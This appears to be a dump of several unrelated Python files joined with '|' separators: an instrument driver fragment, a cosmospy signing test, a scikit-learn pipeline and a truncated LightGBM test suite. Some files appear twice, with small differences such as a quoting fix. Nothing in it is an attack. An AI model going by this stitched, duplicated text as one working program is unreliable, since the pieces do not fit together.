Snap is important when the time constant is very short, a time constant
less than 100 ms.
Args:
*parameters
From 2 to 6 strings of names of parameters for which the values
are requested. including: 'x', 'y', 'r', 'p', 'phase' or 'θ',
'aux1', 'aux2', 'aux3', 'aux4', 'freq', 'ch1', and 'ch2'.
Returns:
A tuple of floating point values in the same order as requested.
Examples:
lockin.snap('x','y') -> tuple(x,y)
lockin.snap('aux1','aux2','freq','phase')
-> tuple(aux1,aux2,freq,phase)
Note:
Volts for x, y, r, and aux 1-4
Degrees for θ
Hertz for freq
Unknown for ch1 and ch2. It will depend on what was set.
- If X,Y,R and θ are all read, then the values of X,Y are recorded
approximately 10 µs apart from R,θ. Thus, the values of X and Y
may not yield the exact values of R and θ from a single snap.
- The values of the Aux Inputs may have an uncertainty of
up to 32 µs.
- The frequency is computed only every other period or 40 ms,
whichever is longer.
"""
if not 2 <= len(parameters) <= 6:
raise KeyError(
'It is only possible to request values of 2 to 6 parameters'
' at a time.')
for name in parameters:
if name.lower() not in self.SNAP_PARAMETERS:
raise KeyError(f'{name} is an unknown parameter. Refer'
f' to `SNAP_PARAMETERS` for a list of valid'
f' parameter names')
p_ids = [self.SNAP_PARAMETERS[name.lower()] for name in parameters]
output = self.ask(f'SNAP? {",".join(p_ids)}')
return tuple(float(val) for val in output.split(','))
def increment_sensitivity(self):
"""
Increment the sensitivity setting of the lock-in. This is equivalent
to pushing the sensitivity up button on the front panel. This has no
effect if the sensitivity is already at the maximum.
Returns:
Whether or not the sensitivity was actually changed.
"""
return self._change_sensitivity(1)
def decrement_sensitivity(self):
"""
Decrement the sensitivity setting of the lock-in. This is equivalent
to pushing the sensitivity down button on the front panel. This has no
effect if the sensitivity is already at the minimum.
Returns:
Whether or not the sensitivity was actually changed.
"""
return self._change_sensitivity(-1)
def _change_sensitivity(self, dn):
_ = self.sensitivity.get()
n = int(self.sensitivity.raw_value)
if self.input_config() in ['a', 'a-b']:
n_to = self._N_TO_VOLT
else:
n_to = self._N_TO_CURR
if n + dn > max(n_to.keys()) or n + dn < min(n_to.keys()):
return False
self.sensitivity.set(n_to[n + dn])
return True
def _set_buffer_SR(self, SR):
self.write('SRAT {}'.format(SR))
self._buffer1_ready = False
self._buffer2_ready = False
def _get_ch_ratio(self, channel):
val_mapping = {1: {0: 'none',
1: 'Aux In 1',
2: 'Aux In 2'},
2: {0: 'none',
1: 'Aux In 3',
2: 'Aux In 4'}}
resp = int(self.ask('DDEF ? {}'.format(channel)).split(',')[1])
return val_mapping[channel][resp]
def _set_ch_ratio(self, channel, ratio):
val_mapping = {1: {'none': 0,
'Aux In 1': 1,
'Aux In 2': 2},
2: {'none': 0,
'Aux In 3': 1,
'Aux In 4': 2}}
vals = val_mapping[channel].keys()
if ratio not in vals:
raise ValueError('{} not in {}'.format(ratio, vals))
ratio = val_mapping[channel][ratio]
disp_val = int(self.ask('DDEF ? {}'.format(channel)).split(',')[0])
self.write('DDEF {}, {}, {}'.format(channel, disp_val, ratio))
self._buffer_ready = False
def _get_ch_display(self, channel):
val_mapping = {1: {0: 'X',
1: 'R',
2: 'X Noise',
3: 'Aux In 1',
4: 'Aux In 2'},
2: {0: 'Y',
1: 'Phase',
2: 'Y Noise',
3: 'Aux In 3',
4: 'Aux In 4'}}
resp = int(self.ask('DDEF ? {}'.format(channel)).split(',')[0])
return val_mapping[channel][resp]
def _set_ch_display(self, channel, disp):
val_mapping = {1: {'X': 0,
'R': 1,
'X Noise': 2,
'Aux In 1': 3,
'Aux In 2': 4},
2: {'Y': 0,
'Phase': 1,
'Y Noise': 2,
'Aux In 3': 3,
'Aux In 4': 4}}
vals = val_mapping[channel].keys()
if disp not in vals:
raise ValueError('{} not in {}'.format(disp, vals))
disp = val_mapping[channel][disp]
# Since ratio AND display are set simultaneously,
# we get and then re-set the current ratio value
ratio_val = int(self.ask('DDEF ? {}'.format(channel)).split(',')[1])
self.write('DDEF {}, {}, {}'.format(channel, disp, ratio_val))
self._buffer_ready = False
def _set_units(self, unit):
# TODO:
# make a public parameter function that allows to change the units
for param in [self.X, self.Y, self.R, self.sensitivity]:
param.unit = unit
def _get_input_config(self, s):
mode = self._N_TO_INPUT_CONFIG[int(s)]
if mode in ['a', 'a-b']:
self.sensitivity.vals = self._VOLT_ENUM
self._set_units('V')
else:
self.sensitivity.vals = self._CURR_ENUM
self._set_units('A')
return mode
def _set_input_config(self, s):
if s in ['a', 'a-b']:
self.sensitivity.vals = self._VOLT_ENUM
self._set_units('V')
else:
self.sensitivity.vals = self._CURR_ENUM
self._set_units('A')
return self._INPUT_CONFIG_TO_N[s]
def _get_sensitivity(self, s):
if self.input_config() in ['a', 'a-b']:
return self._N_TO_VOLT[int(s)]
else:
return self._N_TO_CURR[int(s)]
def _set_sensitivity(self, s):
if self.input_config() in ['a', 'a-b']:
return self._VOLT_TO_N[s]
else:
return self._CURR_TO_N[s]
|
from unittest.mock import Mock
from ward import test
from cosmospy import Transaction
@test("sign transaction")
def _():
private_key = bytes.fromhex("2afc5a66b30e7521d553ec8e6f7244f906df97477248c30c103d7b3f2c671fef")
unordered_sign_message = {
"chain_id": "tendermint_test",
"account_number": "1",
"fee": {"gas": "21906", "amount": [{"amount": "0", "denom": ""}]},
"memo": "",
"sequence": "0",
"msgs": [
{
"type": "cosmos-sdk/Send",
"value": {
"inputs": [
{
"address": "cosmos1qperwt9wrnkg5k9e5gzfgjppzpqhyav5j24d66",
"coins": [{"amount": "1", "denom": "STAKE"}],
}
],
"outputs": [
{
"address": "cosmos1yeckxz7tapz34kjwnjxvmxzurerquhtrmxmuxt",
"coins": [{"amount": "1", "denom": "STAKE"}],
}
],
},
}
],
}
dummy_num = 1337
tx = Transaction(
privkey=private_key,
account_num=dummy_num,
sequence=dummy_num,
fee=dummy_num,
gas=dummy_num,
)
tx._get_sign_message = Mock(return_value=unordered_sign_message)
expected_signature = (
"YjJhlAf7aCnUtLyBNDp9e6LKuNgV7hJC3rmm0Wro5nBsIPVtWzjuobsp/AhR5Kht+HcRF2zBq4AfoNQMIbY6fw=="
)
actual_signature = tx._sign()
assert actual_signature == expected_signature
@test("make transaction pushable to the HTTP API") # type: ignore[no-redef]
def _():
expected_pushable_tx = '{"tx":{"msg":[{"type":"cosmos-sdk/MsgSend","value":{"from_address":"cosmos1lgharzgds89lpshr7q8kcmd2esnxkfpwvuz5tr","to_address":"cosmos103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf","amount":[{"denom":"uatom","amount":"387000"}]}}],"fee":{"gas":"37000","amount":[{"denom":"uatom","amount":"1000"}]},"memo":"","signatures":[{"signature":"chbQMmrg18ZQSt3q3HzW8S8pMyGs/TP/WIbbCyKFd5IiReUY/xJB2yRDEtF92yYBjxEU02z9JNE7VCQmmxWdQw==","pub_key":{"type":"tendermint/PubKeySecp256k1","value":"A49sjCd3Eul+ZXyof7qO460UaO73otrmySHyTNSLW+Xn"},"account_number":"11335","sequence":"0"}]},"mode":"sync"}' # noqa: E501
_tx_total_cost = 388000
fee = 1000
amount = _tx_total_cost - fee
tx = Transaction(
privkey=bytes.fromhex("26d167d549a4b2b66f766b0d3f2bdbe1cd92708818c338ff453abde316a2bd59"),
account_num=11335,
sequence=0,
fee=fee,
gas=37000,
chain_id="cosmoshub-2",
)
tx.add_transfer(recipient="cosmos103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf", amount=amount)
pushable_tx = tx.get_pushable()
assert pushable_tx == expected_pushable_tx
| from unittest.mock import Mock
from ward import test
from cosmospy import Transaction
@test("sign transaction")
def _():
private_key = bytes.fromhex("2afc5a66b30e7521d553ec8e6f7244f906df97477248c30c103d7b3f2c671fef")
unordered_sign_message = {
"chain_id": "tendermint_test",
"account_number": "1",
"fee": {"gas": "21906", "amount": [{"amount": "0", "denom": ""}]},
"memo": "",
"sequence": "0",
"msgs": [
{
"type": "cosmos-sdk/Send",
"value": {
"inputs": [
{
"address": "cosmos1qperwt9wrnkg5k9e5gzfgjppzpqhyav5j24d66",
"coins": [{"amount": "1", "denom": "STAKE"}],
}
],
"outputs": [
{
"address": "cosmos1yeckxz7tapz34kjwnjxvmxzurerquhtrmxmuxt",
"coins": [{"amount": "1", "denom": "STAKE"}],
}
],
},
}
],
}
dummy_num = 1337
tx = Transaction(
privkey=private_key,
account_num=dummy_num,
sequence=dummy_num,
fee=dummy_num,
gas=dummy_num,
)
tx._get_sign_message = Mock(return_value=unordered_sign_message)
expected_signature = (
"YjJhlAf7aCnUtLyBNDp9e6LKuNgV7hJC3rmm0Wro5nBsIPVtWzjuobsp/AhR5Kht+HcRF2zBq4AfoNQMIbY6fw=="
)
actual_signature = tx._sign()
assert actual_signature == expected_signature
@test("make transaction pushable to the HTTP API") # type: ignore[no-redef]
def _():
expected_pushable_tx = '{"tx":{"msg":[{"type":"cosmos-sdk/MsgSend","value":{"from_address":"cosmos1lgharzgds89lpshr7q8kcmd2esnxkfpwvuz5tr","to_address":"cosmos103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf","amount":[{"denom":"uatom","amount":"387000"}]}}],"fee":{"gas":"37000","amount":[{"denom":"uatom","amount":"1000"}]},"memo":"","signatures":[{"signature":"chbQMmrg18ZQSt3q3HzW8S8pMyGs/TP/WIbbCyKFd5IiReUY/xJB2yRDEtF92yYBjxEU02z9JNE7VCQmmxWdQw==","pub_key":{"type":"tendermint/PubKeySecp256k1","value":"A49sjCd3Eul+ZXyof7qO460UaO73otrmySHyTNSLW+Xn"},"account_number":"11335","sequence":"0"}]},"mode":"sync"}' # noqa: E501
_tx_total_cost = 388000
fee = 1000
amount = _tx_total_cost - fee
tx = Transaction(
privkey=bytes.fromhex("26d167d549a4b2b66f766b0d3f2bdbe1cd92708818c338ff453abde316a2bd59"),
account_num=11335,
sequence=0,
fee=fee,
gas=37000,
chain_id="cosmoshub-2",
)
tx.add_transfer(recipient="cosmos103l758ps7403sd9c0y8j6hrfw4xyl70j4mmwkf", amount=amount)
pushable_tx = tx.get_pushable()
assert pushable_tx == expected_pushable_tx
|
import pandas as pd
import logging
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
import pickle
from sklearn.metrics import classification_report
logger = logging.getLogger(__name__)
def columns_to_dummies(df):
"""
Essa função altera os labels das colunas de string para valores binários.
O campo "Gender" é transformado com a função "get_dummies"
Parameters
----------
df : pandas.dataframe
dataframe com todas as colunas utilizadas do projeto
Returns
-------
df: pandas.dataframe
dataframe com colunas com "yes" e "no" para 1 e 0, além do target "class" com valores transformados
"Positive" para 1 e "Negative" para 0.
"""
df['class']=df['class'].replace(['Positive'],1)
df['class']=df['class'].replace(['Negative'],0)
df=df.replace(['Yes'], 1)
df=df.replace(['No'],0)
df = pd.get_dummies(df, columns=['Gender'])
return df
def transform_age(df):
"""
Função que retorna a média de idade dos pacientes com casos positivos
no dataset que está sendo avaliado.
Parameters
----------
df : pandas.dataframe
dataframe com todas as colunas utilizadas do projeto
Returns
-------
df: pandas.dataframe
dataframe com a coluna "Age" na forma boolean
"""
mean_age_positives = int(df.groupby(['class'])['Age'].mean()[1])
logger.info(f'A média de idade dos pacientes positivos é de {mean_age_positives} anos')
df['Age_mean'] = [1 if x >= int(df.groupby(['class'])['Age'].mean()[1]) else 0 for x in df.Age.values]
return df
def featuring_select(df):
"""
Seleciona variáveis importantes utilizando o método "KBest"
Parameters
----------
df : pandas.dataframe
Dataframe pré processado
Returns
-------
df: pandas.dataframe
Dataframe com variáveis a serem utilizadas no modelo
chi_features: list
Lista com variáveis selecionadas pelo KBest
"""
# Será considerado apenas o Gênero Feminino. Se 1 feminino, se 0 masculino
df = df.drop(['Age', 'Gender_Male'], axis=1)
X = df.drop('class', axis=1)
y = df['class']
chi_values = SelectKBest(chi2, k=11).fit(X, y)
selected_features = pd.concat([pd.DataFrame(X.columns), pd.DataFrame(chi_values.scores_)], axis=1)
selected_features.columns = ["features", "values"]
selected_features = selected_features.sort_values(by="values", ascending=False).reset_index(drop=False)
logger.info(f'No teste com o "chi-quadrado", as variáveis selecionadas foram {selected_features['features'][0:-5].to_list()}')
chi_features = selected_features["features"][0:-5].to_list()
return df, chi_features
def train_model(X_train, X_test, y_train, y_test):
"""
Parameters
----------
X_train : list
Lista contendo dados explicativos de treino
X_test : list
Lista contendo dados explicativos de treino
y_train : list
Lista contendo dados do target para treino
y_test : list
Lista contendo dados do target para teste
Returns
-------
"""
params = {'n_estimators': [100, 300], 'max_depth': [2, 3, 4, 5], 'max_features': ['auto', 'sqrt', 'log2']}
logger.info('Iniciando GridSearch')
grid_search_cv = GridSearchCV(RandomForestClassifier(random_state=42), params, verbose=1, cv=5)
grid_search_cv.fit(X_train, y_train)
logger.info('GridSearch e treino do modelo finalizado')
rf_model = grid_search_cv.best_estimator_
y_pred = rf_model.predict(X_test)
target_names = ['negative', 'positive']
logger.info(f'{classification_report(y_test, y_pred, target_names=target_names)}')
feature_scores = pd.Series(rf_model.feature_importances_, index=X_train.columns).sort_values(
ascending=False).to_frame()
logger.info('Salvando modelo treinado')
with open("./models/model.pkl","wb") as f:
pickle.dump(rf_model,f)
return logger.info(f'Variáveis mais importantes no modelo {feature_scores}') | import pandas as pd
import logging
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import GridSearchCV
import pickle
from sklearn.metrics import classification_report
logger = logging.getLogger(__name__)
def columns_to_dummies(df):
"""
Essa função altera os labels das colunas de string para valores binários.
O campo "Gender" é transformado com a função "get_dummies"
Parameters
----------
df : pandas.dataframe
dataframe com todas as colunas utilizadas do projeto
Returns
-------
df: pandas.dataframe
dataframe com colunas com "yes" e "no" para 1 e 0, além do target "class" com valores transformados
"Positive" para 1 e "Negative" para 0.
"""
df['class']=df['class'].replace(['Positive'],1)
df['class']=df['class'].replace(['Negative'],0)
df=df.replace(['Yes'], 1)
df=df.replace(['No'],0)
df = pd.get_dummies(df, columns=['Gender'])
return df
def transform_age(df):
"""
Função que retorna a média de idade dos pacientes com casos positivos
no dataset que está sendo avaliado.
Parameters
----------
df : pandas.dataframe
dataframe com todas as colunas utilizadas do projeto
Returns
-------
df: pandas.dataframe
dataframe com a coluna "Age" na forma boolean
"""
mean_age_positives = int(df.groupby(['class'])['Age'].mean()[1])
logger.info(f'A média de idade dos pacientes positivos é de {mean_age_positives} anos')
df['Age_mean'] = [1 if x >= int(df.groupby(['class'])['Age'].mean()[1]) else 0 for x in df.Age.values]
return df
def featuring_select(df):
"""
Seleciona variáveis importantes utilizando o método "KBest"
Parameters
----------
df : pandas.dataframe
Dataframe pré processado
Returns
-------
df: pandas.dataframe
Dataframe com variáveis a serem utilizadas no modelo
chi_features: list
Lista com variáveis selecionadas pelo KBest
"""
# Será considerado apenas o Gênero Feminino. Se 1 feminino, se 0 masculino
df = df.drop(['Age', 'Gender_Male'], axis=1)
X = df.drop('class', axis=1)
y = df['class']
chi_values = SelectKBest(chi2, k=11).fit(X, y)
selected_features = pd.concat([pd.DataFrame(X.columns), pd.DataFrame(chi_values.scores_)], axis=1)
selected_features.columns = ["features", "values"]
selected_features = selected_features.sort_values(by="values", ascending=False).reset_index(drop=False)
logger.info(f'No teste com o "chi-quadrado", as variáveis selecionadas foram {selected_features["features"][0:-5].to_list()}')
chi_features = selected_features["features"][0:-5].to_list()
return df, chi_features
def train_model(X_train, X_test, y_train, y_test):
"""
Parameters
----------
X_train : list
Lista contendo dados explicativos de treino
X_test : list
Lista contendo dados explicativos de treino
y_train : list
Lista contendo dados do target para treino
y_test : list
Lista contendo dados do target para teste
Returns
-------
"""
params = {'n_estimators': [100, 300], 'max_depth': [2, 3, 4, 5], 'max_features': ['auto', 'sqrt', 'log2']}
logger.info('Iniciando GridSearch')
grid_search_cv = GridSearchCV(RandomForestClassifier(random_state=42), params, verbose=1, cv=5)
grid_search_cv.fit(X_train, y_train)
logger.info('GridSearch e treino do modelo finalizado')
rf_model = grid_search_cv.best_estimator_
y_pred = rf_model.predict(X_test)
target_names = ['negative', 'positive']
logger.info(f'{classification_report(y_test, y_pred, target_names=target_names)}')
feature_scores = pd.Series(rf_model.feature_importances_, index=X_train.columns).sort_values(
ascending=False).to_frame()
logger.info('Salvando modelo treinado')
with open("./models/model.pkl","wb") as f:
pickle.dump(rf_model,f)
return logger.info(f'Variáveis mais importantes no modelo {feature_scores}') |
# coding: utf-8
import copy
import itertools
import math
import pickle
import platform
import random
from pathlib import Path
import numpy as np
import psutil
import pytest
from scipy.sparse import csr_matrix, isspmatrix_csc, isspmatrix_csr
from sklearn.datasets import load_svmlight_file, make_multilabel_classification
from sklearn.metrics import average_precision_score, log_loss, mean_absolute_error, mean_squared_error, roc_auc_score
from sklearn.model_selection import GroupKFold, TimeSeriesSplit, train_test_split
import lightgbm as lgb
from .utils import load_boston, load_breast_cancer, load_digits, load_iris
decreasing_generator = itertools.count(0, -1)
def dummy_obj(preds, train_data):
return np.ones(preds.shape), np.ones(preds.shape)
def multi_logloss(y_true, y_pred):
return np.mean([-math.log(y_pred[i][y]) for i, y in enumerate(y_true)])
def top_k_error(y_true, y_pred, k):
if k == y_pred.shape[1]:
return 0
max_rest = np.max(-np.partition(-y_pred, k)[:, k:], axis=1)
return 1 - np.mean((y_pred[np.arange(len(y_true)), y_true] > max_rest))
def constant_metric(preds, train_data):
return ('error', 0.0, False)
def decreasing_metric(preds, train_data):
return ('decreasing_metric', next(decreasing_generator), False)
def categorize(continuous_x):
return np.digitize(continuous_x, bins=np.arange(0, 1, 0.01))
def test_binary():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1,
'num_iteration': 50 # test num_iteration in dict here
}
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=20,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = log_loss(y_test, gbm.predict(X_test))
assert ret < 0.14
assert len(evals_result['valid_0']['binary_logloss']) == 50
assert evals_result['valid_0']['binary_logloss'][-1] == pytest.approx(ret)
def test_rf():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'boosting_type': 'rf',
'objective': 'binary',
'bagging_freq': 1,
'bagging_fraction': 0.5,
'feature_fraction': 0.5,
'num_leaves': 50,
'metric': 'binary_logloss',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=50,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = log_loss(y_test, gbm.predict(X_test))
assert ret < 0.19
assert evals_result['valid_0']['binary_logloss'][-1] == pytest.approx(ret)
def test_regression():
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'metric': 'l2',
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=50,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = mean_squared_error(y_test, gbm.predict(X_test))
assert ret < 7
assert evals_result['valid_0']['l2'][-1] == pytest.approx(ret)
def test_missing_value_handle():
X_train = np.zeros((100, 1))
y_train = np.zeros(100)
trues = random.sample(range(100), 20)
for idx in trues:
X_train[idx, 0] = np.nan
y_train[idx] = 1
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'metric': 'l2',
'verbose': -1,
'boost_from_average': False
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=20,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = mean_squared_error(y_train, gbm.predict(X_train))
assert ret < 0.005
assert evals_result['valid_0']['l2'][-1] == pytest.approx(ret)
def test_missing_value_handle_more_na():
X_train = np.ones((100, 1))
y_train = np.ones(100)
trues = random.sample(range(100), 80)
for idx in trues:
X_train[idx, 0] = np.nan
y_train[idx] = 0
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'metric': 'l2',
'verbose': -1,
'boost_from_average': False
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=20,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = mean_squared_error(y_train, gbm.predict(X_train))
assert ret < 0.005
assert evals_result['valid_0']['l2'][-1] == pytest.approx(ret)
def test_missing_value_handle_na():
x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
y = [1, 1, 1, 1, 0, 0, 0, 0, 1]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'zero_as_missing': False
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
np.testing.assert_allclose(pred, y)
ret = roc_auc_score(y_train, pred)
assert ret > 0.999
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_missing_value_handle_zero():
x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
y = [0, 1, 1, 1, 0, 0, 0, 0, 0]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'zero_as_missing': True
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
np.testing.assert_allclose(pred, y)
ret = roc_auc_score(y_train, pred)
assert ret > 0.999
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_missing_value_handle_none():
x = [0, 1, 2, 3, 4, 5, 6, 7, np.nan]
y = [0, 1, 1, 1, 0, 0, 0, 0, 0]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'use_missing': False
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
assert pred[0] == pytest.approx(pred[1])
assert pred[-1] == pytest.approx(pred[0])
ret = roc_auc_score(y_train, pred)
assert ret > 0.83
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_categorical_handle():
x = [0, 1, 2, 3, 4, 5, 6, 7]
y = [0, 1, 0, 1, 0, 1, 0, 1]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'min_data_per_group': 1,
'cat_smooth': 1,
'cat_l2': 0,
'max_cat_to_onehot': 1,
'zero_as_missing': True,
'categorical_column': 0
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
np.testing.assert_allclose(pred, y)
ret = roc_auc_score(y_train, pred)
assert ret > 0.999
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_categorical_handle_na():
x = [0, np.nan, 0, np.nan, 0, np.nan]
y = [0, 1, 0, 1, 0, 1]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'min_data_per_group': 1,
'cat_smooth': 1,
'cat_l2': 0,
'max_cat_to_onehot': 1,
'zero_as_missing': False,
'categorical_column': 0
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
np.testing.assert_allclose(pred, y)
ret = roc_auc_score(y_train, pred)
assert ret > 0.999
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_categorical_non_zero_inputs():
x = [1, 1, 1, 1, 1, 1, 2, 2]
y = [1, 1, 1, 1, 1, 1, 0, 0]
X_train = np.array(x).reshape(len(x), 1)
y_train = np.array(y)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_train, y_train)
params = {
'objective': 'regression',
'metric': 'auc',
'verbose': -1,
'boost_from_average': False,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'min_data_per_group': 1,
'cat_smooth': 1,
'cat_l2': 0,
'max_cat_to_onehot': 1,
'zero_as_missing': False,
'categorical_column': 0
}
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=1,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
pred = gbm.predict(X_train)
np.testing.assert_allclose(pred, y)
ret = roc_auc_score(y_train, pred)
assert ret > 0.999
assert evals_result['valid_0']['auc'][-1] == pytest.approx(ret)
def test_multiclass():
X, y = load_digits(n_class=10, return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'multiclass',
'metric': 'multi_logloss',
'num_class': 10,
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, params=params)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, params=params)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=50,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = multi_logloss(y_test, gbm.predict(X_test))
assert ret < 0.16
assert evals_result['valid_0']['multi_logloss'][-1] == pytest.approx(ret)
def test_multiclass_rf():
X, y = load_digits(n_class=10, return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'boosting_type': 'rf',
'objective': 'multiclass',
'metric': 'multi_logloss',
'bagging_freq': 1,
'bagging_fraction': 0.6,
'feature_fraction': 0.6,
'num_class': 10,
'num_leaves': 50,
'min_data': 1,
'verbose': -1,
'gpu_use_dp': True
}
lgb_train = lgb.Dataset(X_train, y_train, params=params)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train, params=params)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=50,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = multi_logloss(y_test, gbm.predict(X_test))
assert ret < 0.23
assert evals_result['valid_0']['multi_logloss'][-1] == pytest.approx(ret)
def test_multiclass_prediction_early_stopping():
X, y = load_digits(n_class=10, return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'multiclass',
'metric': 'multi_logloss',
'num_class': 10,
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train, params=params)
gbm = lgb.train(params, lgb_train,
num_boost_round=50)
pred_parameter = {"pred_early_stop": True,
"pred_early_stop_freq": 5,
"pred_early_stop_margin": 1.5}
ret = multi_logloss(y_test, gbm.predict(X_test, **pred_parameter))
assert ret < 0.8
assert ret > 0.6 # loss will be higher than when evaluating the full model
pred_parameter["pred_early_stop_margin"] = 5.5
ret = multi_logloss(y_test, gbm.predict(X_test, **pred_parameter))
assert ret < 0.2
def test_multi_class_error():
X, y = load_digits(n_class=10, return_X_y=True)
params = {'objective': 'multiclass', 'num_classes': 10, 'metric': 'multi_error',
'num_leaves': 4, 'verbose': -1}
lgb_data = lgb.Dataset(X, label=y)
est = lgb.train(params, lgb_data, num_boost_round=10)
predict_default = est.predict(X)
results = {}
est = lgb.train(dict(params, multi_error_top_k=1), lgb_data, num_boost_round=10,
valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
predict_1 = est.predict(X)
# check that default gives same result as k = 1
np.testing.assert_allclose(predict_1, predict_default)
# check against independent calculation for k = 1
err = top_k_error(y, predict_1, 1)
assert results['training']['multi_error'][-1] == pytest.approx(err)
# check against independent calculation for k = 2
results = {}
est = lgb.train(dict(params, multi_error_top_k=2), lgb_data, num_boost_round=10,
valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
predict_2 = est.predict(X)
err = top_k_error(y, predict_2, 2)
assert results['training']['multi_error@2'][-1] == pytest.approx(err)
# check against independent calculation for k = 10
results = {}
est = lgb.train(dict(params, multi_error_top_k=10), lgb_data, num_boost_round=10,
valid_sets=[lgb_data], evals_result=results, verbose_eval=False)
predict_3 = est.predict(X)
err = top_k_error(y, predict_3, 10)
